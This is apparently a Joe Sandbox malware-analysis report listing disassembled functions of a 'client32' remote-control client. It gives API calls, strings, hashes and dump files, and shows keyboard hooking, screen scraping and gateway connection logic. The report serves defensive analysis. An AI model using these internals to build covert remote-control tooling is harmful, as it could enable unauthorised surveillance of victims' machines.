Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateEventMetricsSystem
String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$226546$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
API String ID: 1866202007-448119206
Opcode ID: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
Opcode Fuzzy Hash: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52

Function 1102D5B0 Relevance: 81.1, APIs: 15, Strings: 31, Instructions: 630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Client, xrefs: 1102D995, 1102D9CD, 1102DAE4
Error x%x reading %s, sesh=%d, xrefs: 1102D861
MacAddress, xrefs: 1102DADF
TSMode, xrefs: 1102D990
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102DEC0
Wtsapi32.dll, xrefs: 1102D9DC
TCPIP, xrefs: 1102D9B5
%s.%02d, xrefs: 1102DD00
$session$, xrefs: 1102DD66
ts macaddr=%s, xrefs: 1102DACC
client32.ini, xrefs: 1102D805
226546, xrefs: 1102DBF5, 1102DDBB, 1102DDDF, 1102DDEC, 1102DE1C, 1102DE91
%session%, xrefs: 1102DD7A
IsA(), xrefs: 1102DD29, 1102DDA8
WTSFreeMemory, xrefs: 1102DB11
30/10/15 13:45:13 V12.10F4, xrefs: 1102DE6E
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DAA4
NSMWClass, xrefs: 1102D794
%sessionname%, xrefs: 1102DD39, 1102DD52
ListenPort, xrefs: 1102D9B0
ClientName, xrefs: 1102DB95
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102DE9A
DisableConsoleClient, xrefs: 1102D917
, xrefs: 1102DB65
screenscrape, xrefs: 1102D9C8
client32, xrefs: 1102D8D5
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102DD24, 1102DDA3
WTSQuerySessionInformationA, xrefs: 1102DA4E
client32 dbi %hs, xrefs: 1102DE73
Warning: Unexpanded clientname=<%s>, xrefs: 1102DCA3
%02d, xrefs: 1102DCE8

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$226546$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1984265443-2842706374
Opcode ID: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
Opcode Fuzzy Hash: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61

Function 685A3D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 685A3D27

Strings

PROTOCOL_VER=%u.%u, xrefs: 685A3EEB
CMPI=%u, xrefs: 685A3FEA
A2=%s, xrefs: 685A4109
*Dept, xrefs: 685A41F4
CHATID, xrefs: 685A400A
CMD=OPEN, xrefs: 685A3EB9
MAXPACKET=%d, xrefs: 685A3F01
*Gsk, xrefs: 685A3E24
HOSTNAME=%s, xrefs: 685A3F9A
1.1, xrefs: 685A3E02
CHATID=%s, xrefs: 685A4046
CLIENT_ADDR=%s, xrefs: 685A3F4A
A3=%s, xrefs: 685A4163
TCPIP, xrefs: 685A3DCF, 685A3DDF
CLIENT_VERSION=1.0, xrefs: 685A3ED0
APPTYPE=%d, xrefs: 685A41DD
Port, xrefs: 685A3DCA
ListenPort, xrefs: 685A3DDA
CLIENT_NAME=%s, xrefs: 685A3F17
226546, xrefs: 685A3F0C
connection_index == 0, xrefs: 685A3D7A
A4=%s, xrefs: 685A41BD
client247, xrefs: 685A400F, 685A406B, 685A40D1, 685A412B, 685A4185
GSK=%s, xrefs: 685A3FCC
A1=%s, xrefs: 685A40AF
PORT=%d, xrefs: 685A3F68
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 685A3D75
DEPT=%s, xrefs: 685A420C

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: *Dept$*Gsk$1.1$226546$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
API String ID: 2102423945-1702074230
Opcode ID: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
Instruction ID: 44891fd80584a1afe0cb340a92391f0779c0d43f19a44a21a32dfc9e2d24338d
Opcode Fuzzy Hash: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
Instruction Fuzzy Hash: 91E182B6C4061CAACB21DB648C90FFFB778AF99205FC045D9E90963141EB356F848FA5

Function 1113FBE0 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,74DF23A0), ref: 1113FC13
LoadLibraryA.KERNEL32(?), ref: 1113FC5C
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

Strings

MiniDumpWriteDump, xrefs: 1113FD43
SymGetLineFromAddr, xrefs: 1113FC98
DBGHELP.DLL, xrefs: 1113FC6F, 1113FC74
SymGetLineFromName, xrefs: 1113FCB7
IMAGEHLP.DLL, xrefs: 1113FC7E, 1113FC83, 1113FC89
SymSetOptions, xrefs: 1113FD17
SymLoadModule, xrefs: 1113FCF6
SymCleanup, xrefs: 1113FCEB
SymInitialize, xrefs: 1113FD01
SymGetLinePrev, xrefs: 1113FCCA
SymGetOptions, xrefs: 1113FD0C
SymFunctionTableAccess, xrefs: 1113FD38
StackWalk, xrefs: 1113FCE3
SymGetSymFromAddr, xrefs: 1113FD2D
SymGetModuleInfo, xrefs: 1113FD22
SymMatchFileName, xrefs: 1113FCD5
SymGetLineNext, xrefs: 1113FCBF
dbghelp.dll, xrefs: 1113FC38

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
Instruction ID: 7823fe44ffa72cf0609a50e83b8fe1e4d3ef80fae5d5290087d1941409006158
Opcode Fuzzy Hash: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
Instruction Fuzzy Hash: 8A413F70A00B05AFD7209F7A8CC8E6AFBF8FF59715B04496EE485D3690E774E8408B59

Function 1113DAD0 Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 266
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
SetLastError.KERNEL32(00000078), ref: 1113DB73
FreeLibrary.KERNEL32(00000000), ref: 1113DB85
LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
_memset.LIBCMT ref: 1113DC3D
LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
GetStockObject.GDI32(00000000), ref: 1113DC9A
LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
RegisterClassExA.USER32(?), ref: 1113DCB5

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
#17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4

Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18

Strings

Client, xrefs: 1113DB2A
InitUI (%d), xrefs: 1113DAFB
_License, xrefs: 1113DBF6
*quiet, xrefs: 1113DBF1
NSMWClass, xrefs: 1113DC1B, 1113DCAE
NSMGetAppIcon(), xrefs: 1113DC6B
pcihooks, xrefs: 1113DD4D
UI.CPP, xrefs: 1113DC66, 1113DCC7
View, xrefs: 1113DD9E
TraceCopyData, xrefs: 1113DDBB
imm32, xrefs: 1113DBBA
riched32.dll, xrefs: 1113DECF
SetProcessDPIAware, xrefs: 1113DB5E
HookKeyboard, xrefs: 1113DD61
_debug, xrefs: 1113DDC0
*DisableDPIAware, xrefs: 1113DB25

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
String ID: *DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
API String ID: 2794364348-3534351892
Opcode ID: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
Instruction ID: eeaa44aaf805afce620a012973528e55005956dd55c3add89e5b481fbdd40cac
Opcode Fuzzy Hash: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
Instruction Fuzzy Hash: FCB1F674A1122A9FDB02DFE1CD88BADFBB5AB8472EF904138E525972C8F7745040CB56

Function 1102D679 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1

Strings

Client, xrefs: 1102D995, 1102D9CD, 1102DAE4
Error x%x reading %s, sesh=%d, xrefs: 1102D861
30/10/15 13:45:13 V12.10F4, xrefs: 1102DE6E
MacAddress, xrefs: 1102DADF
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DAA4
TSMode, xrefs: 1102D990
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102DEC0
ListenPort, xrefs: 1102D9B0
ClientName, xrefs: 1102DB95
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102DE9A
Wtsapi32.dll, xrefs: 1102D9DC
TCPIP, xrefs: 1102D9B5
DisableConsoleClient, xrefs: 1102D917
, xrefs: 1102DB65
screenscrape, xrefs: 1102D9C8
WTSQuerySessionInformationA, xrefs: 1102DA4E
client32 dbi %hs, xrefs: 1102DE73
ts macaddr=%s, xrefs: 1102DACC
client32.ini, xrefs: 1102D805
226546, xrefs: 1102DBF5, 1102DE1C, 1102DE91
WTSFreeMemory, xrefs: 1102DB11

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $226546$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1029625771-398807400
Opcode ID: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
Opcode Fuzzy Hash: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61

Function 685963C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(685DB898,00000000,?,00000000,?,6859D77B,00000000), ref: 685963E8
InterlockedDecrement.KERNEL32(-0003F3B7), ref: 685963FA
EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6859D77B,00000000), ref: 68596412
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859643B
SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596450
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859646F
SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596484
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 685964A3
SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 685964C5
shutdown.WSOCK32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964E9
GetLastError.KERNEL32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964F2
timeGetTime.WINMM(?,00000001,?,00000000,?,6859D77B,00000000), ref: 68596510
#16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596526
GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596533
timeGetTime.WINMM(?,00000000,?,6859D77B,00000000), ref: 68596540
Sleep.KERNEL32(00000001,?,00000000,?,6859D77B,00000000), ref: 6859654B
#16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596563
closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596574
WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859657D
Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859658E
GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859659E
_memset.LIBCMT ref: 685965C8
LeaveCriticalSection.KERNEL32(?,?,6859D77B,00000000), ref: 685965D7
LeaveCriticalSection.KERNEL32(685DB898,?,00000000,?,6859D77B,00000000), ref: 685965F2

Strings

CloseGatewayConnection - shutdown(%u) FAILED (%d), xrefs: 685964FD
CloseGatewayConnection - closesocket(%u) FAILED (%d), xrefs: 685965A9
InternetCloseHandle, xrefs: 68596435, 68596469, 6859649D

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
API String ID: 3764039262-2631155478
Opcode ID: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
Instruction ID: 369a002f3b48f126020b325555e63da1069fb9b65c6b3de85ce35cf1eb95a096
Opcode Fuzzy Hash: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
Instruction Fuzzy Hash: 46518275640340AFDB10EFA8C888B9A77F9EF89315FD14515EE1AD7280DB70E888CB95

Function 685998D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strncmp.LIBCMT ref: 6859996F
_strncmp.LIBCMT ref: 685999A5

Strings

NC_DATA, xrefs: 68599969
3', xrefs: 68599CB2
abort send, gateway hungup, xrefs: 68599D2E
CMD=NC_DATA, xrefs: 6859999F
Error %d sending HTTP request on connection %d, xrefs: 68599D1F
%02x %02x, xrefs: 68599AE7
Error %d writing inet request on connection %d, xrefs: 68599BE3
SendHttpReq failed, not connected to gateway!, xrefs: 68599934, 68599B79
%s, xrefs: 68599AAA
Error send returned 0 on connection %d, xrefs: 68599CF8
xx %02x, xrefs: 68599AFB

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
